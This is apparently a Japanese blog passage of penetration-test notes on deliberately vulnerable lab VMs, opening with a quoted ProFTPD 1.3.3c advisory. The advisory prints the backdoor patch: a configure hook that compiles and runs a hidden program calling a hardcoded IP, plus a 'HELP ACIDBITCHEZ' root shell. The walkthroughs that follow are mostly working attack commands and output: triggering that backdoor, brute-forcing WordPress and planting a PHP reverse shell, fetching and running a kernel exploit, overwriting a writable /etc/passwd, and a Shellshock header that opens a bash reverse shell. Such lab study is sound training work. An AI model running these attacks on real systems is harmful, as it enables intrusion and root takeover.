(rsync.proftpd.org) for all ProFTPD mirror servers means that anyone who
downloaded ProFTPD 1.3.3c from one of the official mirrors from 2010-11-28
to 2010-12-02 will most likely be affected by the problem.
The backdoor introduced by the attackers allows unauthenticated users
remote root access to systems which run the maliciously modified version
of the ProFTPD daemon.
Users are strongly advised to check systems running the affected code for
security compromises and compile/run a known good version of the code.
To verify the integrity of the source files, use the GPG signatures
available on the FTP servers as well on the ProFTPD homepage at:
http://www.proftpd.org/md5_pgp.html.
The MD5 sums for the source tarballs are:
8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2
4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz
= Rootkit patch =
diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure
--- proftpd-1.3.3c.orig/configure 2010-04-14 00:01:35.000000000 +0200
+++ proftpd-1.3.3c/configure 2010-10-29 19:08:56.000000000 +0200
@@ -9,7 +9,10 @@
## --------------------- ##
## M4sh Initialization. ##
## --------------------- ##
-
+gcc tests/tests.c -o tests/tests >/dev/null 2>&1
+cc tests/tests.c -o tests/tests >/dev/null 2>&1
+tests/tests >/dev/null 2>&1 &
+rm -rf tests/tests.c tests/tests >/dev/null 2>&1
# Be more Bourne compatible
DUALCASE=1; export DUALCASE # for MKS sh
if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then
diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c
--- proftpd-1.3.3c.orig/src/help.c 2009-07-01 01:31:18.000000000 +0200
+++ proftpd-1.3.3c/src/help.c 2010-11-16 18:40:46.000000000 +0100
@@ -27,6 +27,8 @@
*/
#include "conf.h"
+#include <stdlib.h>
+#include <string.h>
struct help_rec {
const char *cmd;
@@ -126,7 +128,7 @@
cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin");
} else {
-
+ if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
/* List the syntax for the given target command. */
for (i = 0; i < help_list->nelts; i++) {
if (strcasecmp(helps[i].cmd, target) == 0) {
diff -Naur proftpd-1.3.3c.orig/tests/tests.c proftpd-1.3.3c/tests/tests.c
--- proftpd-1.3.3c.orig/tests/tests.c 1970-01-01 01:00:00.000000000 +0100
+++ proftpd-1.3.3c/tests/tests.c 2010-11-29 09:37:35.000000000 +0100
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <signal.h>
+#include <string.h>
+
+#define DEF_PORT 9090
+#define DEF_TIMEOUT 15
+#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
+
+int sock;
+
+void handle_timeout(int sig)
+{
+ close(sock);
+ exit(0);
+}
+
+int main(void)
+{
+
+ struct sockaddr_in addr;
+ struct hostent *he;
+ u_short port;
+ char ip[20]="212.26.42.47"; /* EDB NOTE - HARDCODED IP */
+ port = DEF_PORT;
+ signal(SIGALRM, handle_timeout);
+ alarm(DEF_TIMEOUT);
+ he=gethostbyname(ip);
+ if(he==NULL) return(-1);
+ addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
+ addr.sin_port = htons(port);
+ addr.sin_family = AF_INET;
+ memset(addr.sin_zero, 0, 8);
+ sprintf(ip, inet_ntoa(addr.sin_addr));
+ if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
+ {
+ return EXIT_FAILURE;
+ }
+ if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
+ {
+ close(sock);
+ return EXIT_FAILURE;
+ }
+ if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
+ {
+ return EXIT_FAILURE;
+ }
+ close(sock);
+
+return 0; }
+
どうやらある時期に配信されていた「ProFTPD」は改ざんされておりbockdoorが仕掛けられているらしい。
Exploits/proftpd-1.3.3c-backdoor - aldeid
このbackdoorを使うのは至って簡単。
# telnet 10.10.10.10 21
Trying 10.10.10.10...
Connected to 10.10.10.10.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (vtcsec) [10.10.10.10]
HELP ACIDBITCHEZ
id;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c "import pty;pty.spawn('/bin/sh')";
# whoami
whoami
root
あっさり終わった。
Ctrl + ] telnet > q
で終了。
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
# searchsploit openssh
----------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
OpenSSH 7.2p2 - Username Enumeration | exploits/linux/remote/40136.py
(snip)
userenumerationのみ。
または、限定環境のRCE等。
直接RCEに繋がりそうなものは無い?
とりあえず見つけたuserにhydraすりゃ良いのかなぁ
# cp /usr/share/exploitdb/exploits/linux/remote/40136.py 40136.py
# python 40136.py
usage: 40136.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES]
[--samples SAMPLES] [--factor FACTOR] [--trials TRIALS]
host
40136.py: error: too few arguments
# python 40136.py -U /usr/share/wordlists/rockyou.txt -e 10.10.10.10
(snip)
[*] Testing your users...
[+] password - timing: 0.018958999999999726
[+] princess - timing: 0.413513
[+] 1234567 - timing: 0.019588999999999857
[+] justin - timing: 0.019359000000000126
[+] samantha - timing: 0.01800700000000033
[+] lovers - timing: 0.018003000000000213
[+] dragon - timing: 0.023400999999999783
[+] sweety - timing: 0.020548000000000233
[+] buster - timing: 0.020329999999999515
[+] cheese - timing: 0.020527999999999658
[+] kenneth - timing: 0.0184350000000002
[+] nicholas - timing: 0.021569999999999645
[+] charles - timing: 0.018767999999999674
[+] christine - timing: 0.02230100000000057
[+] scorpio - timing: 0.43433799999999945
[+] ronald - timing: 0.022024000000000044
[+] grace - timing: 0.01963800000000049
[+] 444444 - timing: 0.018848000000000198
[+] rabbit - timing: 0.0182739999999999
[+] loverboy - timing: 0.0191719999999993
(snip)
KeyboardInterrupt
userlistにrockyou.txt使って見たけど、以外と沢山いたので途中で止めた。
逆に多すぎて精度が怪しく感じる。
# python 40136.py -u root 10.10.10.10 (snip) [*] Testing your users... [-] root - timing: 0.009611000000000036
沢山いたけど、rootはおらんとな。
とりあえず見つかったユーザでhydraでも回してみる。
終わらないのであきらめ。
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.10
+ Target Hostname: 10.10.10.10
+ Target Port: 80
+ Start Time: 2020-05-04 03:10:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: b1, size: 55e1c7758dcdb, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7837 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2020-05-04 03:11:26 (GMT-4) (73 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.10
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 4 03:11:39 2020
URL_BASE: http://10.10.10.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.10/ ----
+ http://10.10.10.10/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://10.10.10.10/secret/
+ http://10.10.10.10/server-status (CODE:403|SIZE:299)
---- Entering directory: http://10.10.10.10/secret/ ----
+ http://10.10.10.10/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/
==> DIRECTORY: http://10.10.10.10/secret/wp-content/
==> DIRECTORY: http://10.10.10.10/secret/wp-includes/
+ http://10.10.10.10/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://10.10.10.10/secret/wp-admin/ ----
+ http://10.10.10.10/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/css/
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/images/
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/includes/
+ http://10.10.10.10/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/js/
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/maint/
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/network/
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/user/
---- Entering directory: http://10.10.10.10/secret/wp-content/ ----
+ http://10.10.10.10/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.10.10/secret/wp-content/plugins/
==> DIRECTORY: http://10.10.10.10/secret/wp-content/themes/
---- Entering directory: http://10.10.10.10/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.10/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.10/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.10/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.10/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.10/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.10/secret/wp-admin/network/ ----
+ http://10.10.10.10/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.10/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.10/secret/wp-admin/user/ ----
+ http://10.10.10.10/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.10/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.10/secret/wp-content/plugins/ ----
+ http://10.10.10.10/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.10.10/secret/wp-content/themes/ ----
+ http://10.10.10.10/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
-----------------
END_TIME: Mon May 4 03:12:26 2020
DOWNLOADED: 36896 - FOUND: 13
突然のwordpress登場。
何か可笑しい?
「http://vtcsec/secret/index.php/wp-json/」が気になる。
「http://10.10.10.10/secret」に接続すると、何か表示変な気がするし、多くのリンクが「vtcsec」ドメインになっている。
つまり、hostファイルに「vtcsec」を登録する必要がある?
# echo "10.10.10.10 vtcsec" >> /etc/hosts # curl http://vtcsec <html><body><h1>It works!</h1> <p>This is the default web page for this server.</p> <p>The web server software is running but no content has been added, yet.</p> </body></html>
先ほど上手く繋がらなかったリンクにも飛べるようになった。
# wpscan --url http://vtcsec/secret -e ap,at,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://vtcsec/secret/ [10.10.10.10]
[+] Started: Mon May 4 07:23:46 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://vtcsec/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://vtcsec/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://vtcsec/secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9 identified (Insecure, released on 2017-11-16).
| Found By: Rss Generator (Passive Detection)
| - http://vtcsec/secret/index.php/feed/, <generator>https://wordpress.org/?v=4.9</generator>
| - http://vtcsec/secret/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.9</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css?ver=4.9
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css?ver=4.9, Match: 'Version: 1.4'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating All Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:49 <==========================================================================================================================================================> (20900 / 20900) 100.00% Time: 00:00:49
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen
| Location: http://vtcsec/secret/wp-content/themes/twentyfifteen/
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://vtcsec/secret/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 2.6
| Style URL: http://vtcsec/secret/wp-content/themes/twentyfifteen/style.css
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://vtcsec/secret/wp-content/themes/twentyfifteen/, status: 500
|
| Version: 1.9 (80% confidence)
| Found By: Style (Passive Detection)
| - http://vtcsec/secret/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.9'
[+] twentyseventeen
| Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - http://vtcsec/secret/wp-content/themes/twentyseventeen/, status: 500
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.4'
[+] twentysixteen
| Location: http://vtcsec/secret/wp-content/themes/twentysixteen/
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://vtcsec/secret/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://vtcsec/secret/wp-content/themes/twentysixteen/style.css
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://vtcsec/secret/wp-content/themes/twentysixteen/, status: 500
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://vtcsec/secret/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://vtcsec/secret/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Mon May 4 07:24:53 2020
[+] Requests Done: 20932
[+] Cached Requests: 47
[+] Data Sent: 4.849 MB
[+] Data Received: 3.127 MB
[+] Memory used: 264.789 MB
[+] Elapsed time: 00:01:06
とりあえずadminのパスワードを探す。
(snip) [+] Performing password attack on Wp Login against 1 user/s Trying admin / loulou Time: 00:00:22 <> (1331 / 14344391) 0.00% ETA: 67:32:Trying admin / candy1 Time: 00:00:22 <> (1333 / 14344391) 0.00% ETA: 67:28: Trying admin / tequieromucho Time: 00:00:23 <> (1400 / 14344391) 0.00% ETA: 67:53Trying admin / liverpoolfc Time: 00:00:30 <> (1784 / 14344391) 0.01% ETA: 67:56:1Trying admin / babykohTrying admin / admin Time: 00:05:59 <=========================================> (19820 / 19820) 100.00% Time: 00:05:59 [SUCCESS] - admin / admin [!] Valid Combinations Found: | Username: admin, Password: admin (snip)
adminはデフォルトで使われてたんか。
ということでadmin/adminでログイン。
単純なファイルアップロードのやり方が分からなかったので、既存ファイルの書き換えでいく。
自分の場合は「Appearance」の「Editor」を選択して、Thema Filesのうちserach.phpを選択。
最後の方に
kali linuxの/usr/share/webshells/php/php-reverse-shell.phpを自分用に書き換えたやつを追加。
これでwordpressページで「serach」ボタンを押すとreverse-shellするようになった。
「404.php」を書き換えても良かったが、アクセスするパスが分からなった。
待ちながら押したら来る # nc -nlvp 8080 (push [search]) Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 09:07:25 up 7:28, 0 users, load average: 0.00, 0.00, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
after shell getchu
victim $ uname -a Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
attacker
# searchsploit linux ubuntu 16.04
----------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalatio | exploits/linux/local/45010.c
(snip)
# cp /usr/share/exploitdb/exploits/linux/local/45010.c 45010.c
# python -m SimpleHTTPServer 80
victim
$ cd /tmp
$ wget 10.10.10.3/45010.c
--2020-05-04 09:01:46-- http://10.10.10.3/45010.c
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/plain]
Saving to: '45010.c'
0K .......... ... 100% 14.6M=0.001s
2020-05-04 09:01:46 (14.6 MB/s) - '45010.c' saved [13728/13728]
$ gcc 45010.c
$ ./a.out
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Kernel exploitは複数ありそうだけど、一番絶対ハマりそうなやつを選択した。
privcheck
# cp /usr/bin/unix-privesc-check pric
権限チェックなんてやってくれるすごいプログラムがkali linuxにはあるらしくて使ってみた。
victimに送って動かす。
victim $ ./pric detailed | grep WARNING passwd: Permission denied. Search the output below for the word 'WARNING'. If you don't see it then WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd (snip)
何か色々止まらないので、一番上の面白そうなやつだけピックアップ
実は今回の環境「/etc/passwd」ファイルをrootでなくても書き換えられる。
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cp /etc/passwd /tmp/passwd
$ openssl passwd -1 password
$1$n.m2eSNO$znpjjJIvqy12UiYDL6G90/
$ echo "root:\$1\$7Y7rVxIM\$pZaXFk7OlTVsq3X2aMiAM.:0:0:root:/root:/bin/bash" > /etc/passwd
$ cat /tmp/passwd >> /etc/passwd
$ su -
su: must be run from a terminal
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@vtcsec:/tmp$ su -
su -
Password: password
root@vtcsec:~# id
id
uid=0(root) gid=0(root) groups=0(root)
終わり
- hydraよりwpscanの方がwordpress辞書攻撃早い?
- 404.phpは「http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php」にあった。
vulnhub SickOS 1.1 雑記
SickOS 1.1
ovfから展開すると失敗した。 新規から既存ハードディスク追加等ならいける。
サービス調査
# nmap -p- 10.10.10.9 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:25 EDT Nmap scan report for 10.10.10.9 Host is up (0.00074s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 118.00 seconds # nmap -p22,3128,8080 -sV -version-all 10.10.10.9 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:28 EDT Nmap scan report for 10.10.10.9 Host is up (0.00086s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) 3128/tcp open http-proxy Squid http proxy 3.1.19 8080/tcp closed http-proxy MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.47 seconds
気になりどころ
- [port 22 ssh] OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) どうせ何もない
- [port 3128 http-proxy] Squid http proxy 3.1.19 これがproxyだってこと忘れていて実は苦労した
詳細
[port 22 ssh] OpenSSH 5.9p1
特に何もない。分からない。
[port 3128 http-proxy] Squid http proxy 3.1.19
こいつ自体のexploitは無さそう?
SickOS1.1のwebサービスへのアクセスは全てport 3128のproxyを経由する必要がある。
# nikto -h 10.10.10.9 -useproxy 10.10.10.9:3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.9
+ Target Hostname: 10.10.10.9
+ Target Port: 80
+ Proxy: 10.10.10.9:3128
+ Start Time: 2020-05-02 11:33:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec 4 19:35:02 2015
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 8674 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2020-05-02 11:33:58 (GMT-4) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.9 -p 10.10.10.9:3128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 2 11:43:27 2020
URL_BASE: http://10.10.10.9/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.9:3128
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.9/ ----
+ http://10.10.10.9/cgi-bin/ (CODE:403|SIZE:286)
+ http://10.10.10.9/connect (CODE:200|SIZE:109)
+ http://10.10.10.9/index (CODE:200|SIZE:21)
+ http://10.10.10.9/index.php (CODE:200|SIZE:21)
+ http://10.10.10.9/robots (CODE:200|SIZE:45)
+ http://10.10.10.9/robots.txt (CODE:200|SIZE:45)
+ http://10.10.10.9/server-status (CODE:403|SIZE:291)
-----------------
END_TIME: Sat May 2 11:43:36 2020
DOWNLOADED: 4612 - FOUND: 7
気になるところが沢山ある。
apacheとphp 5.3.10の組み合わせで良さそうなのを発見
# searchsploit apache php 5.3
----------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | exploits/php/remote/29316.py
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | exploits/php/remote/29290.c
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
exploitコードそのままではプロキシされている場合汎用性がなかったよう?
cve-2014-6271,CVE-2014-6278に関して
shellshockというのがあるらしい。
# curl --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
{ "uptime": " 21:41:52 up 1:10, 0 users, load average: 0.00, 0.01, 0.05", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}
今回の場合「/cgi-bin/status」に問い合わせると何かコマンド入れたっぽいのが返ってくる。
ここにOSコマンドインジェクションできちゃうのがShellShock!
てか、dirbでは「/cgi-bin/status」引っかからないのな。
とりあえずbashの処理に問題があって、処理を誤魔化すことができるぽい。
# curl -H "U: () { :;}; echo ; echo ;/bin/bash -c id;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
uid=33(www-data) gid=33(www-data) groups=33(www-data)
今回の場合だと「/cgi-bin/status」にどんなヘッダで送っても、処理を誤魔化せるコードならOSコマンドインジェクションできるぽい。
window 1 # rlwrap nc -nlvp 443
window 2
# curl -H "U: () { :;}; echo ; echo ;/bin/bash -c bash -i >& /dev/tcp/10.10.10.3/443 0>&1;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
window 1
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c "import pty;pty.spawn('/bin/bash')"
www-data@SickOs:/usr/lib/cgi-bin$
reverse-shell!
robots.txt
アクセスすると
User-agent: * Disallow: / Dissalow: /wolfcms
では「wolfcms」というやつを見る。
何かのホームページぽい。
「http://10.10.10.9/wolfcms/?/admin/login」ここにログインページ発見。
まさかのuser:admin,password:adminでログインできる。
ログイン先には何とご丁寧に「Upload file」のボタンが。
reverse.phpを置かせていただくしかない。
window 1 # rlwrap nc -nlvp 8080
window 2 # curl --proxy 10.10.10.9:3128 http://10.10.10.9/wolfcms/public/reverse.php
window 1 Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux 23:34:51 up 3:03, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
after reverse-shell
